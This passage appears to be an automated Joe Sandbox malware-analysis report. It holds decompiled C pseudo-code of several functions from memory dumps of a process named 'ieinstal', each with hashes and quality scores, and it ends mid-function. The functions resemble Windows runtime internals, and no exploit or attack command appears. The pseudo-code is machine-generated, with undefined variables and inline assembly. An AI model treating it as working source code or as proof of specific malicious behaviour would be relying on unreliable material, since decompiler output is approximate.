                        C-Code - Quality: 95%
                        			E1ED0AA16(signed short* __ecx) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				signed short _v16;
                        				intOrPtr _v20;
                        				signed short _v24;
                        				signed short _v28;
                        				void* _v32;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr _t25;
                        				signed short _t38;
                        				signed short* _t42;
                        				signed int _t44;
                        				signed short* _t52;
                        				signed short _t53;
                        				signed int _t54;
                        
                        				_v8 =  *0x1edfd360 ^ _t54;
                        				_t42 = __ecx;
                        				_t44 =  *__ecx & 0x0000ffff;
                        				_t52 =  &(__ecx[2]);
                        				_t51 = _t44 + 2;
                        				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                        					L4:
                        					_t25 =  *0x1edf7b9c; // 0x0
                        					_t53 = L1ED24620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                        					__eflags = _t53;
                        					if(_t53 == 0) {
                        						L3:
                        						return E1ED4B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                        					} else {
                        						E1ED4F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                        						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                        						L2:
                        						_t51 = 4;
                        						if(L1ED16C59(_t53, _t51, _t58) != 0) {
                        							_t28 = E1ED35E50(0x1ecec338, 0, 0,  &_v32);
                        							__eflags = _t28;
                        							if(_t28 == 0) {
                        								_t38 = ( *_t42 & 0x0000ffff) + 2;
                        								__eflags = _t38;
                        								_v24 = _t53;
                        								_v16 = _t38;
                        								_v20 = 0;
                        								_v12 = 0;
                        								E1ED3B230(_v32, _v28, 0x1ecec2d8, 1,  &_v24);
                        								_t28 = E1ED0F7A0(_v32, _v28);
                        							}
                        							__eflags = _t53 -  *_t52;
                        							if(_t53 !=  *_t52) {
                        								_t28 = L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                        							}
                        						}
                        						goto L3;
                        					}
                        				}
                        				_t53 =  *_t52;
                        				_t44 = _t44 >> 1;
                        				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                        				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                        					goto L4;
                        				}
                        				goto L2;
                        			}





















                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5b696159ba3a572f3c02d7c3c27b19dda9a9828927bc76dcf90b8721eeb72b25
                        • Instruction ID: 6806a4ec734d7c8bdd444bfab46c9e645dfed028da62f8c2dbc6107afeba03cc
                        • Opcode Fuzzy Hash: 5b696159ba3a572f3c02d7c3c27b19dda9a9828927bc76dcf90b8721eeb72b25
                        • Instruction Fuzzy Hash: 0B31E371A10259ABCB04CF64CD81ABFB7BAFF48700B114669F901EB280E774ED11CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 97%
                        			E1ED361A0(signed int* __ecx) {
                        				intOrPtr _v8;
                        				char _v12;
                        				intOrPtr* _v16;
                        				intOrPtr _v20;
                        				intOrPtr _t30;
                        				intOrPtr _t31;
                        				void* _t32;
                        				intOrPtr _t33;
                        				intOrPtr _t37;
                        				intOrPtr _t49;
                        				signed int _t51;
                        				intOrPtr _t52;
                        				signed int _t54;
                        				void* _t59;
                        				signed int* _t61;
                        				intOrPtr* _t64;
                        
                        				_t61 = __ecx;
                        				_v12 = 0;
                        				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                        				_v16 = __ecx;
                        				_v8 = 0;
                        				if(_t30 == 0) {
                        					L6:
                        					_t31 = 0;
                        					L7:
                        					return _t31;
                        				}
                        				_t32 = _t30 + 0x5d8;
                        				if(_t32 == 0) {
                        					goto L6;
                        				}
                        				_t59 = _t32 + 0x30;
                        				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                        					goto L6;
                        				}
                        				if(__ecx != 0) {
                        					 *((intOrPtr*)(__ecx)) = 0;
                        					 *((intOrPtr*)(__ecx + 4)) = 0;
                        				}
                        				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                        					_t51 =  *(_t32 + 0x10);
                        					_t33 = _t32 + 0x10;
                        					_v20 = _t33;
                        					_t54 =  *(_t33 + 4);
                        					if((_t51 | _t54) == 0) {
                        						_t37 = E1ED35E50(0x1ece67cc, 0, 0,  &_v12);
                        						if(_t37 != 0) {
                        							goto L6;
                        						}
                        						_t52 = _v8;
                        						asm("lock cmpxchg8b [esi]");
                        						_t64 = _v16;
                        						_t49 = _t37;
                        						_v20 = 0;
                        						if(_t37 == 0) {
                        							if(_t64 != 0) {
                        								 *_t64 = _v12;
                        								 *((intOrPtr*)(_t64 + 4)) = _t52;
                        							}
                        							E1EDD9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                        							_t31 = 1;
                        							goto L7;
                        						}
                        						E1ED0F7C0(_t52, _v12, _t52, 0);
                        						if(_t64 != 0) {
                        							 *_t64 = _t49;
                        							 *((intOrPtr*)(_t64 + 4)) = _v20;
                        						}
                        						L12:
                        						_t31 = 1;
                        						goto L7;
                        					}
                        					if(_t61 != 0) {
                        						 *_t61 = _t51;
                        						_t61[1] = _t54;
                        					}
                        					goto L12;
                        				} else {
                        					goto L6;
                        				}
                        			}




















                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 824466de51d61803a758f6a32ab813029c200b2cb86721055660693adf5bac38
                        • Instruction ID: 350d39ccd6f4bdb3f6bb93e0c4a792b2f2cafaec507214ec0a1418ff6028c83c
                        • Opcode Fuzzy Hash: 824466de51d61803a758f6a32ab813029c200b2cb86721055660693adf5bac38
                        • Instruction Fuzzy Hash: 11318FB2A093018FD350CF19C910B1AB7E6FB88B05F164E6DE9949B395D770E804CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 93%
                        			E1ED48EC7(void* __ecx, void* __edx) {
                        				signed int _v8;
                        				signed int* _v16;
                        				intOrPtr _v20;
                        				signed int* _v24;
                        				char* _v28;
                        				signed int* _v32;
                        				intOrPtr _v36;
                        				signed int* _v40;
                        				signed int* _v44;
                        				signed int* _v48;
                        				intOrPtr _v52;
                        				signed int* _v56;
                        				signed int* _v60;
                        				signed int* _v64;
                        				intOrPtr _v68;
                        				signed int* _v72;
                        				char* _v76;
                        				signed int* _v80;
                        				signed int _v84;
                        				signed int* _v88;
                        				intOrPtr _v92;
                        				signed int* _v96;
                        				intOrPtr _v100;
                        				signed int* _v104;
                        				signed int* _v108;
                        				char _v140;
                        				signed int _v144;
                        				signed int _v148;
                        				signed int* _v152;
                        				char _v156;
                        				signed int* _v160;
                        				char _v164;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* _t67;
                        				intOrPtr _t70;
                        				void* _t71;
                        				void* _t72;
                        				signed int _t73;
                        
                        				_t69 = __edx;
                        				_v8 =  *0x1edfd360 ^ _t73;
                        				_t48 =  *[fs:0x30];
                        				_t72 = __edx;
                        				_t71 = __ecx;
                        				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                        					_t48 = E1ED34E70(0x1edf86e4, 0x1ed49490, 0, 0);
                        					if( *0x1edf53e8 > 5 && E1ED48F33(0x1edf53e8, 0, 0x2000) != 0) {
                        						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                        						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                        						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                        						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                        						_v108 =  &_v84;
                        						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                        						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                        						_v76 =  &_v156;
                        						_t70 = 8;
                        						_v60 =  &_v144;
                        						_t67 = 4;
                        						_v44 =  &_v148;
                        						_v152 = 0;
                        						_v160 = 0;
                        						_v104 = 0;
                        						_v100 = 2;
                        						_v96 = 0;
                        						_v88 = 0;
                        						_v80 = 0;
                        						_v72 = 0;
                        						_v68 = _t70;
                        						_v64 = 0;
                        						_v56 = 0;
                        						_v52 = 0x1edf53e8;
                        						_v48 = 0;
                        						_v40 = 0;
                        						_v36 = 0x1edf53e8;
                        						_v32 = 0;
                        						_v28 =  &_v164;
                        						_v24 = 0;
                        						_v20 = _t70;
                        						_v16 = 0;
                        						_t69 = 0x1ecebc46;
                        						_t48 = E1ED87B9C(0x1edf53e8, 0x1ecebc46, _t67, 0x1edf53e8, _t70,  &_v140);
                        					}
                        				}
                        				return E1ED4B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                        			}












































                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d6dc59bdf9de2f2845536a7e6e78f9441f945ec60beb2e7f960b0815c8c15e71
                        • Instruction ID: 11a1f69cc1a1e1da62949d540b3a28c2e65b8f8451d8407ef491f941988ca965
                        • Opcode Fuzzy Hash: d6dc59bdf9de2f2845536a7e6e78f9441f945ec60beb2e7f960b0815c8c15e71
                        • Instruction Fuzzy Hash: 3741A3B5D00258DFDB10CFAAD981AADFBF5BB48710F5042AEE509A7640DB709A45CF60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 58%
                        			E1ED44A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                        				signed int _v8;
                        				signed int* _v12;
                        				char _v13;
                        				signed int _v16;
                        				char _v21;
                        				signed int* _v24;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t29;
                        				signed int* _t32;
                        				signed int* _t41;
                        				signed int _t42;
                        				void* _t43;
                        				intOrPtr* _t51;
                        				void* _t52;
                        				signed int _t53;
                        				signed int _t58;
                        				void* _t59;
                        				signed int _t60;
                        				signed int _t62;
                        
                        				_t49 = __edx;
                        				_t62 = (_t60 & 0xfffffff8) - 0xc;
                        				_t26 =  *0x1edfd360 ^ _t62;
                        				_v8 =  *0x1edfd360 ^ _t62;
                        				_t41 = __ecx;
                        				_t51 = __edx;
                        				_v12 = __ecx;
                        				if(_a4 == 0) {
                        					if(_a8 != 0) {
                        						goto L1;
                        					}
                        					_v13 = 1;
                        					E1ED22280(_t26, 0x1edf8608);
                        					_t58 =  *_t41;
                        					if(_t58 == 0) {
                        						L11:
                        						E1ED1FFB0(_t41, _t51, 0x1edf8608);
                        						L2:
                        						 *0x1edfb1e0(_a4, _a8);
                        						_t42 =  *_t51();
                        						if(_t42 == 0) {
                        							_t29 = 0;
                        							L5:
                        							_pop(_t52);
                        							_pop(_t59);
                        							_pop(_t43);
                        							return E1ED4B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                        						}
                        						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                        						if(_v21 != 0) {
                        							_t53 = 0;
                        							E1ED22280(_t28, 0x1edf8608);
                        							_t32 = _v24;
                        							if( *_t32 == _t58) {
                        								 *_t32 = _t42;
                        								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                        								if(_t58 != 0) {
                        									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                        									asm("sbb edi, edi");
                        									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                        								}
                        							}
                        							E1ED1FFB0(_t42, _t53, 0x1edf8608);
                        							if(_t53 != 0) {
                        								L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                        							}
                        						}
                        						_t29 = _t42;
                        						goto L5;
                        					}
                        					if( *((char*)(_t58 + 0x40)) != 0) {
                        						L10:
                        						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                        						E1ED1FFB0(_t41, _t51, 0x1edf8608);
                        						_t29 = _t58;
                        						goto L5;
                        					}
                        					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                        					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                        						goto L11;
                        					}
                        					goto L10;
                        				}
                        				L1:
                        				_v13 = 0;
                        				_t58 = 0;
                        				goto L2;
                        			}

























                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9c9603e655cdf69c2599e11a0d58101dbdb7e5324be1f512f952cb514e078cc4
                        • Instruction ID: bb563c837e348503f1195eb827e53494108eeb2af731b24b6f7d0cdda52458be
                        • Opcode Fuzzy Hash: 9c9603e655cdf69c2599e11a0d58101dbdb7e5324be1f512f952cb514e078cc4
                        • Instruction Fuzzy Hash: 343138366056E1DBC321CF14CD41B1AF7E6FF91718F610B69E4954BA80C770E885CB96
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 74%
                        			E1ED3E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                        				intOrPtr* _v0;
                        				signed char _v4;
                        				signed int _v8;
                        				void* __ecx;
                        				void* __ebp;
                        				void* _t37;
                        				intOrPtr _t38;
                        				signed int _t44;
                        				signed char _t52;
                        				void* _t54;
                        				intOrPtr* _t56;
                        				void* _t58;
                        				char* _t59;
                        				signed int _t62;
                        
                        				_t58 = __edx;
                        				_push(0);
                        				_push(4);
                        				_push( &_v8);
                        				_push(0x24);
                        				_push(0xffffffff);
                        				if(E1ED49670() < 0) {
                        					L1ED5DF30(_t54, _t58, _t35);
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					asm("int3");
                        					_push(_t54);
                        					_t52 = _v4;
                        					if(_t52 > 8) {
                        						_t37 = 0xc0000078;
                        					} else {
                        						_t38 =  *0x1edf7b9c; // 0x0
                        						_t62 = _t52 & 0x000000ff;
                        						_t59 = L1ED24620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                        						if(_t59 == 0) {
                        							_t37 = 0xc0000017;
                        						} else {
                        							_t56 = _v0;
                        							 *(_t59 + 1) = _t52;
                        							 *_t59 = 1;
                        							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                        							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                        							_t44 = _t62 - 1;
                        							if(_t44 <= 7) {
                        								switch( *((intOrPtr*)(_t44 * 4 +  &M1ED3E810))) {
                        									case 0:
                        										L6:
                        										 *((intOrPtr*)(_t59 + 8)) = _a8;
                        										goto L7;
                        									case 1:
                        										L13:
                        										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                        										goto L6;
                        									case 2:
                        										L12:
                        										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                        										goto L13;
                        									case 3:
                        										L11:
                        										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                        										goto L12;
                        									case 4:
                        										L10:
                        										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                        										goto L11;
                        									case 5:
                        										L9:
                        										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                        										goto L10;
                        									case 6:
                        										L17:
                        										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                        										goto L9;
                        									case 7:
                        										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                        										goto L17;
                        								}
                        							}
                        							L7:
                        							 *_a40 = _t59;
                        							_t37 = 0;
                        						}
                        					}
                        					return _t37;
                        				} else {
                        					_push(0x20);
                        					asm("ror eax, cl");
                        					return _a4 ^ _v8;
                        				}
                        			}


















                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e32a8ea0f651c334809564aabeea730a5548d5669d8eb638575743ce58474c56
                        • Instruction ID: 06f4ccad8b3edf1d758a85fc687088be2df57735b7480b108ce7e04e1022c04f
                        • Opcode Fuzzy Hash: e32a8ea0f651c334809564aabeea730a5548d5669d8eb638575743ce58474c56
                        • Instruction Fuzzy Hash: D2315CB5A14249AFD744CF59C841B8AB7E4FB49214F148666FD04CB381D631E980CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 67%
                        			E1ED3BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                        				intOrPtr _v8;
                        				intOrPtr _v12;
                        				void* __ebx;
                        				void* __edi;
                        				intOrPtr _t22;
                        				intOrPtr* _t41;
                        				intOrPtr _t51;
                        
                        				_t51 =  *0x1edf6100; // 0x69
                        				_v12 = __edx;
                        				_v8 = __ecx;
                        				if(_t51 >= 0x800) {
                        					L12:
                        					return 0;
                        				} else {
                        					goto L1;
                        				}
                        				while(1) {
                        					L1:
                        					_t22 = _t51;
                        					asm("lock cmpxchg [ecx], edx");
                        					if(_t51 == _t22) {
                        						break;
                        					}
                        					_t51 = _t22;
                        					if(_t22 < 0x800) {
                        						continue;
                        					}
                        					goto L12;
                        				}
                        				E1ED22280(0xd, 0x9a5cf1a0);
                        				_t41 =  *0x1edf60f8; // 0x0
                        				if(_t41 != 0) {
                        					 *0x1edf60f8 =  *_t41;
                        					 *0x1edf60fc =  *0x1edf60fc + 0xffff;
                        				}
                        				E1ED1FFB0(_t41, 0x800, 0x9a5cf1a0);
                        				if(_t41 != 0) {
                        					L6:
                        					asm("movsd");
                        					asm("movsd");
                        					asm("movsd");
                        					asm("movsd");
                        					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                        					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                        					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                        					do {
                        						asm("lock xadd [0x1edf60f0], ax");
                        						 *((short*)(_t41 + 0x34)) = 1;
                        					} while (1 == 0);
                        					goto L8;
                        				} else {
                        					_t41 = L1ED24620(0x1edf6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                        					if(_t41 == 0) {
                        						L11:
                        						asm("lock dec dword [0x1edf6100]");
                        						L8:
                        						return _t41;
                        					}
                        					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                        					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                        					if(_t41 == 0) {
                        						goto L11;
                        					}
                        					goto L6;
                        				}
                        			}











                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 772111723f77b5ad5bf5894557cea906d800d12758fd282e3ddddd7906c5026b
                        • Instruction ID: 030503c4d7de3458a07d8c009e8b3e83e0ddb067afd9075b852b41b214821dd7
                        • Opcode Fuzzy Hash: 772111723f77b5ad5bf5894557cea906d800d12758fd282e3ddddd7906c5026b
                        • Instruction Fuzzy Hash: 6A3131B6A00696DBCB01DF68D4C079A33B0EF08312F250278EC9ADB245EB71DD068BD0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 60%
                        			E1ED31DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                        				char _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				intOrPtr* _v20;
                        				void* _t22;
                        				char _t23;
                        				void* _t36;
                        				intOrPtr _t42;
                        				intOrPtr _t43;
                        
                        				_v12 = __ecx;
                        				_t43 = 0;
                        				_v20 = __edx;
                        				_t42 =  *__edx;
                        				 *__edx = 0;
                        				_v16 = _t42;
                        				_push( &_v8);
                        				_push(0);
                        				_push(0);
                        				_push(6);
                        				_push(0);
                        				_push(__ecx);
                        				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                        				_push(_t36);
                        				_t22 = E1ED2F460();
                        				if(_t22 < 0) {
                        					if(_t22 == 0xc0000023) {
                        						goto L1;
                        					}
                        					L3:
                        					return _t43;
                        				}
                        				L1:
                        				_t23 = _v8;
                        				if(_t23 != 0) {
                        					_t38 = _a4;
                        					if(_t23 >  *_a4) {
                        						_t42 = L1ED24620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                        						if(_t42 == 0) {
                        							goto L3;
                        						}
                        						_t23 = _v8;
                        					}
                        					_push( &_v8);
                        					_push(_t23);
                        					_push(_t42);
                        					_push(6);
                        					_push(_t43);
                        					_push(_v12);
                        					_push(_t36);
                        					if(E1ED2F460() < 0) {
                        						if(_t42 != 0 && _t42 != _v16) {
                        							L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                        						}
                        						goto L3;
                        					}
                        					 *_v20 = _t42;
                        					 *_a4 = _v8;
                        				}
                        				_t43 = 1;
                        				goto L3;
                        			}












                        Similarity
                        • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                        • Instruction ID: 18929da7094bc8ef9c9fd8baae4cda17661afdedf268a53b755765811462f3bd
                        • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                        • Instruction Fuzzy Hash: 1321B2B5A0015AEFC710CF6ACC80E9FBBBDEF85645F614666E901A7250D731EE01CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 76%
                        			E1ED09100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                        				signed int _t53;
                        				signed int _t56;
                        				signed int* _t60;
                        				signed int _t63;
                        				signed int _t66;
                        				signed int _t69;
                        				void* _t70;
                        				intOrPtr* _t72;
                        				void* _t78;
                        				void* _t79;
                        				signed int _t80;
                        				intOrPtr _t82;
                        				void* _t85;
                        				void* _t88;
                        				void* _t89;
                        
                        				_t84 = __esi;
                        				_t70 = __ecx;
                        				_t68 = __ebx;
                        				_push(0x2c);
                        				_push(0x1eddf6e8);
                        				E1ED5D0E8(__ebx, __edi, __esi);
                        				 *((char*)(_t85 - 0x1d)) = 0;
                        				_t82 =  *((intOrPtr*)(_t85 + 8));
                        				if(_t82 == 0) {
                        					L4:
                        					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                        						E1EDD88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                        					}
                        					L5:
                        					return E1ED5D130(_t68, _t82, _t84);
                        				}
                        				_t88 = _t82 -  *0x1edf86c0; // 0x2fb07b0
                        				if(_t88 == 0) {
                        					goto L4;
                        				}
                        				_t89 = _t82 -  *0x1edf86b8; // 0x300f308
                        				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                        					goto L4;
                        				} else {
                        					E1ED22280(_t82 + 0xe0, _t82 + 0xe0);
                        					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                        					__eflags =  *((char*)(_t82 + 0xe5));
                        					if(__eflags != 0) {
                        						E1EDD88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                        						goto L12;
                        					} else {
                        						__eflags =  *((char*)(_t82 + 0xe4));
                        						if( *((char*)(_t82 + 0xe4)) == 0) {
                        							 *((char*)(_t82 + 0xe4)) = 1;
                        							_push(_t82);
                        							_push( *((intOrPtr*)(_t82 + 0x24)));
                        							E1ED4AFD0();
                        						}
                        						while(1) {
                        							_t60 = _t82 + 8;
                        							 *(_t85 - 0x2c) = _t60;
                        							_t68 =  *_t60;
                        							_t80 = _t60[1];
                        							 *(_t85 - 0x28) = _t68;
                        							 *(_t85 - 0x24) = _t80;
                        							while(1) {
                        								L10:
                        								__eflags = _t80;
                        								if(_t80 == 0) {
                        									break;
                        								}
                        								_t84 = _t68;
                        								 *(_t85 - 0x30) = _t80;
                        								 *(_t85 - 0x24) = _t80 - 1;
                        								asm("lock cmpxchg8b [edi]");
                        								_t68 = _t84;
                        								 *(_t85 - 0x28) = _t68;
                        								 *(_t85 - 0x24) = _t80;
                        								__eflags = _t68 - _t84;
                        								_t82 =  *((intOrPtr*)(_t85 + 8));
                        								if(_t68 != _t84) {
                        									continue;
                        								}
                        								__eflags = _t80 -  *(_t85 - 0x30);
                        								if(_t80 !=  *(_t85 - 0x30)) {
                        									continue;
                        								}
                        								__eflags = _t80;
                        								if(_t80 == 0) {
                        									break;
                        								}
                        								_t63 = 0;
                        								 *(_t85 - 0x34) = 0;
                        								_t84 = 0;
                        								__eflags = 0;
                        								while(1) {
                        									 *(_t85 - 0x3c) = _t84;
                        									__eflags = _t84 - 3;
                        									if(_t84 >= 3) {
                        										break;
                        									}
                        									__eflags = _t63;
                        									if(_t63 != 0) {
                        										L40:
                        										_t84 =  *_t63;
                        										__eflags = _t84;
                        										if(_t84 != 0) {
                        											_t84 =  *(_t84 + 4);
                        											__eflags = _t84;
                        											if(_t84 != 0) {
                        												 *0x1edfb1e0(_t63, _t82);
                        												 *_t84();
                        											}
                        										}
                        										do {
                        											_t60 = _t82 + 8;
                        											 *(_t85 - 0x2c) = _t60;
                        											_t68 =  *_t60;
                        											_t80 = _t60[1];
                        											 *(_t85 - 0x28) = _t68;
                        											 *(_t85 - 0x24) = _t80;
                        											goto L10;
                        										} while (_t63 == 0);
                        										goto L40;
                        									}
                        									_t69 = 0;
                        									__eflags = 0;
                        									while(1) {
                        										 *(_t85 - 0x38) = _t69;
                        										__eflags = _t69 -  *0x1edf84c0;
                        										if(_t69 >=  *0x1edf84c0) {
                        											break;
                        										}
                        										__eflags = _t63;
                        										if(_t63 != 0) {
                        											break;
                        										}
                        										_t66 = E1EDD9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                        										__eflags = _t66;
                        										if(_t66 == 0) {
                        											_t63 = 0;
                        											__eflags = 0;
                        										} else {
                        											_t63 = _t66 + 0xfffffff4;
                        										}
                        										 *(_t85 - 0x34) = _t63;
                        										_t69 = _t69 + 1;
                        									}
                        									_t84 = _t84 + 1;
                        								}
                        								__eflags = _t63;
                        							}
                        							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                        							 *((char*)(_t82 + 0xe5)) = 1;
                        							 *((char*)(_t85 - 0x1d)) = 1;
                        							L12:
                        							 *(_t85 - 4) = 0xfffffffe;
                        							E1ED0922A(_t82);
                        							_t53 = E1ED27D50();
                        							__eflags = _t53;
                        							if(_t53 != 0) {
                        								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        							} else {
                        								_t56 = 0x7ffe0386;
                        							}
                        							__eflags =  *_t56;
                        							if( *_t56 != 0) {
                        								_t56 = E1EDD8B58(_t82);
                        							}
                        							__eflags =  *((char*)(_t85 - 0x1d));
                        							if( *((char*)(_t85 - 0x1d)) != 0) {
                        								__eflags = _t82 -  *0x1edf86c0; // 0x2fb07b0
                        								if(__eflags != 0) {
                        									__eflags = _t82 -  *0x1edf86b8; // 0x300f308
                        									if(__eflags == 0) {
                        										_t79 = 0x1edf86bc;
                        										_t72 = 0x1edf86b8;
                        										goto L18;
                        									}
                        									__eflags = _t56 | 0xffffffff;
                        									asm("lock xadd [edi], eax");
                        									if(__eflags == 0) {
